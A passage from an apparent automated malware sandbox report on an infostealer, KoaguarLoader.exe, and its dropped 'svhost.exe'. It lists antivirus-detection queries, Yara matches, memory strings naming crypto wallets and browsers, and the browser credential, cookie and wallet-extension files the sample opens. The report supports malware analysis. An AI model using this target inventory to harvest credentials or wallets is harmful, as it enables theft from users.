                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
                        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svhost.exe | VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: svhost.exe, 00000003.00000002.2146294254.000000001BF55000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2152581567.000000001CA50000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2152581567.000000001CA61000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2146294254.000000001BFAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 2.2.KoaguarLoader.exe.e80000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 16.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.I1y524I4zau1n3u.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 9.2.HkqNfKUrMBAD.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000010.00000002.1215210538.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000002.00000002.939032080.000000000167D000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.2129024902.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000009.00000002.1079600336.0000000000EDD000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.943416104.0000000000A8D000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: KoaguarLoader.exe PID: 5744, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: I1y524I4zau1n3u.exe PID: 3816, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7336, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: I1y524I4zau1n3u.exe PID: 7616, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: HkqNfKUrMBAD.exe PID: 7956, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
                        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match | File source: KoaguarLoader.exe, type: SAMPLE
                        Source: Yara match | File source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: KoaguarLoader.exe PID: 6992, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: svhost.exe PID: 5248, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type avx512finvaliduintptrChanDir using , type= Value>Convert::ffff:answersExpiresSubjectCONOUT$charsetInstAltInstNopalt -> nop -> any -> (empty)Not-ECTOPTIONSoptionsalt-svcpurpose%v: %#x2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9%s (%s)%s %#vquic ivquic hpquic kugo_funcgo_stepos/execruntime#interngo_opengo_readgo_syncgo_lockamxtileamxint8amxbf16osxsaveavxifmaavxvnnii32.eqzi64.eqzi32.clzi32.ctzi32.addi32.subi32.muli32.andi32.xori32.shli64.clzi64.ctzi64.addi64.subi64.muli64.andi64.xori64.shlf32.absf32.negf32.addf32.subf32.mulf32.divf32.minf32.maxf64.absf64.negf64.addf64.subf64.mulf64.divf64.minf64.maxv128.orfuncrefelementsuccessBrTableStore16Store32NearestRefFuncV128AddV128SubV128AndV128NotV128XorV128ShlV128ShrV128CmpV128MulV128DivV128NegV128AbsV128MinV128MaxV128Dot.returnWSAPolltelegramBytecoinbytecoinEthereumElectrumMyMoneroCoinbaseCrocobitMetamaskStarcoinWaterfoxK-MeleonCyberfoxBlackHawChromiumElementsCatalinaQIP Surfbinpath=${TEMP}/chunking-nostatsCapsLockPageDowncheckDOHatoi: %s$appdata
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: : ` %#xPUT103503*/*302403421425getackanyenvneti32i64f32f64nopu32u64s32s64EqzAddSubMulClzCtzDivRemAndXorShlShrAbsNegMinMaxBUG:%dstrJaxxCoreEverMathNamiTronUranEdgesent.zip-q:vtrue%s%cLAltRAltLWinRWinAppsDownLeftHomeNum0Num1Num2Num3Num4Num5Num6Num7Num8Num9Num*Num+Num-Num.Num/bibawinv.exedataOS: IP: .jpg.txtTRUEopen/PIDwmiccallPATH:443readnullbooljson'\''eEpPRGBAGrayCMYKjpeg
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2134971267.0000000001439000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletG
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2134884260.0000000001429000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:sse41sse42ssse3int16int32int64uint8slicekind= (at ClassRetryparseutf-8%s*%dtext/bad nmatchrune 0-RTT1-RTTclear15:04tableblockbr_if%d Ki%d Mi%d Gi%d TilabelLoad8StoreFloorTrunc%s %d%s %s%s.%s%s %fI8x16I16x8I32x4I64x2F32x4F64x2stdin%#x: Attr(ArmoryExodusGuardaBitappCoin98FewchaFinnieIconexKaikasOxygenPontemSaturnSolletWombatXMR.PTXinPayChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsc.execreatedeletestart $temp\chunk!audio=video=LShiftRShiftPageUpInsertDelete[AFK] 0.22.0 (x86)acceptAnswer GB
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2134971267.0000000001439000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp | String found in binary or memory: go_full_pathnameavx512vpclmulqdqi64.extend_i32_si64.extend_i32_uf32.convert_i64uv128.load8_splatv128.load32_zerov128.load64_zerov128.load16_lanev128.load32_lanev128.load64_lanev128.store8_lanei32.atomic.storei64.atomic.store%s invalid as %vinvalid drop: %vdecode int33: %wkind != func: %sresult too largeF32DemoteFromF64V128FloatPromoteargs invalid: %wread element: %wunaligned atomictoo many waitersWTSQueryUserTokenSetWindowsHookExAGetKeyboardLayoutD877F783D5D3EF8CsA7FDF864FBC10B77sF8806DD0C461824FsC2B05980D9127787s0CA814316818D8F6sCoSetProxyBlanketEthereum\keystoreinvalid file path\Telegram DesktopBrowsers\Cookies_taskkill /F /PID Write after Closedecryption failedhandshake failureillegal parametermissing extensionunrecognized namereflect.Value.Intin string literal0123456789ABCDEFX0123456789abcdefxillegal hex digitcan't scan type: invalid stream IDTransfer-EncodingHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIf-Modified-Sinceframe_ping_lengthtruncated headersif-modified-sincetransfer-encodingx-forwarded-protoX-Idempotency-KeyMoved PermanentlyFailed DependencyToo Many Requests
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fldfpgipfncgndfolcbkdeeknbbbnhcc
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
